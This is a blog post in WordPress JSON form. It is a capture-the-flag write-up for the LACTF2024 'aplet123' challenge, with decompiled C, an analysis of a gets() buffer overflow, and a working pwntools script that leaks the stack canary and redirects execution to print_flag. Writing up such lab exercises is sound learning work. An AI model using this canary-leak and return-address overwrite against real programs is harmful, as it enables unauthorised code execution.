{"id":3340,"date":"2025-04-14T19:48:09","date_gmt":"2025-04-14T10:48:09","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3340"},"modified":"2025-04-14T19:48:11","modified_gmt":"2025-04-14T10:48:11","slug":"lactf2024-aplet123","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3340","title":{"rendered":"[LACTF2024] aplet123"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">[*] '\/home\/seo\/study\/LACTF2024\/aplet123\/aplet123'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    Stripped:   No<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompiled src<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Input is read into the <code>haystack<\/code> buffer (72 bytes) with <code>gets<\/code><\/li>\n\n\n\n<li>If the input string contains <code>\"i'm\"<\/code>, the string right after <code>\"i'm\"<\/code> is extracted and printed in the form <code>hi &lt;name>, i'm aplet123<\/code>.<\/li>\n\n\n\n<li>Entering <code>\"bye\"<\/code> exits the main loop.<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  unsigned int v3; \/\/ eax\n  int v5; \/\/ eax\n  char *v6; \/\/ [rsp+8h] [rbp-58h]\n  char haystack[72]; \/\/ [rsp+10h] [rbp-50h] BYREF\n
  unsigned __int64 v8; \/\/ [rsp+58h] [rbp-8h]\n\n  v8 = __readfsqword(0x28u);\n  setbuf(_bss_start, 0);\n  v3 = time(0);\n  srand(v3);\n  puts(\"hello\");\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      while ( 1 )\n      {\n        gets(haystack);\n        v6 = strstr(haystack, \"i'm\");\n        if ( !v6 )\n          break;\n        printf(\"hi %s, i'm aplet123\\n\", v6 + 4);\n      }\n      if ( strcmp(haystack, \"please give me the flag\") )\n        break;\n      puts(\"i'll consider it\");\n      sleep(5u);\n      puts(\"no\");\n    }\n    if ( !strcmp(haystack, \"bye\") )\n      break;\n    v5 = rand();\n    puts(responses[v5 % 0x21uLL]);\n  }\n  puts(\"bye\");\n  return 0;\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis<\/h3>\n\n\n\n<p>The <code>gets<\/code> function has no input length limit, so a BOF (stack buffer overflow) vulnerability is possible. <br>Building a payload of 69 consecutive A bytes + <code>\"i'm\"<\/code> leaks the canary: the input fills all 72 bytes of <code>haystack<\/code>, so <code>v6 + 4<\/code> points one byte past the end of the buffer and <code>printf<\/code> prints the upper 7 bytes of the canary (its low byte is always 0x00). 
<br>After that, send 72 bytes of A + the 8-byte canary + 8 bytes of saved-rbp filler + the address of print_flag; when the loop exits via <code>\"bye\"<\/code>, main returns into print_flag and the flag is obtained.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">unsigned __int64 print_flag()\n{\n  FILE *stream; \/\/ [rsp+8h] [rbp-118h]\n  char s[264]; \/\/ [rsp+10h] [rbp-110h] BYREF\n  unsigned __int64 v3; \/\/ [rsp+118h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  stream = fopen(\"flag.txt\", \"r\");\n  fgets(s, 256, stream);\n  puts(s);\n  return v3 - __readfsqword(0x28u);\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">solve.py<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">import warnings\nfrom pwn import *\n# context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\np = process(\".\/aplet123\")\ne = ELF('.\/aplet123', checksec=True)  # No PIE, so print_flag has a fixed address\n\n# Stage 1: fill haystack (72 bytes) so that \"i'm\" ends exactly at the buffer end.\n# printf then prints from v6 + 4, one byte past the buffer: the canary's upper 7 bytes.\npayload = b\"A\"*(72-3) + b\"i'm\"\n\np.sendlineafter(b\"hello\\n\", payload)\np.recvuntil(b\"hi \")\n# The canary's low byte is always 0x00, so restore it before unpacking.\ncanary = p.recv(7).rjust(0x8, b\"\\x00\")\ncanary = u64(canary)\nsuccess(f\"canary: {hex(canary)}\")\n\n# Stage 2: overflow past the (intact) canary and saved rbp, overwrite the return address.\npayload = b\"A\"*72\npayload += p64(canary)\npayload += b\"B\"*8                       # saved rbp, value irrelevant\npayload += p64(e.symbols[\"print_flag\"])  # return address = print_flag\n\np.sendlineafter(b\"aplet123\\n\", payload)\n\n# \"bye\" breaks out of the loop; main returns into print_flag.\np.sendline(b\"bye\")\n\np.interactive()<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Result<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" 
data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/aplet123$ python3 solve.py\n[+] Starting local process '.\/aplet123': pid 5528\n[*] '\/home\/seo\/study\/LACTF2024\/aplet123\/aplet123'\n    Arch:       amd64-64-little\n    RELRO:      Partial RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        No PIE (0x400000)\n    Stripped:   No\n[+] canary: 0x38089fcbde44af00\n[*] Switching to interactive mode\nunlucky\nbye\nflag{fake_flag}\n\n[*] Got EOF while reading in interactive\n$\n[*] Interrupted\n[*] Process '.\/aplet123' stopped with exit code -11 (SIGSEGV) (pid 5528)\nseo@seo:~\/study\/LACTF2024\/aplet123$ cat flag.txt\nflag{fake_flag}<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>checksec Decompiled src Analysis The gets function has no input length limit, so a BOF vulnerability is possible. Building a payload of 69 consecutive A bytes + \"i'm\" leaks the canary. 
After that, 72 bytes of A + the 8-byte canary +&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3340\" rel=\"bookmark\">Read more &raquo;<span class=\"screen-reader-text\">[LACTF2024] aplet123<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[19],"tags":[25],"class_list":["post-3340","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3340","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3340"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3340\/revisions"}],"predecessor-version":[{"id":3341,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3340\/revisions\/3341"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3340"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3340"},{"taxonomy":"post_tag","embeddable
":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3340"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}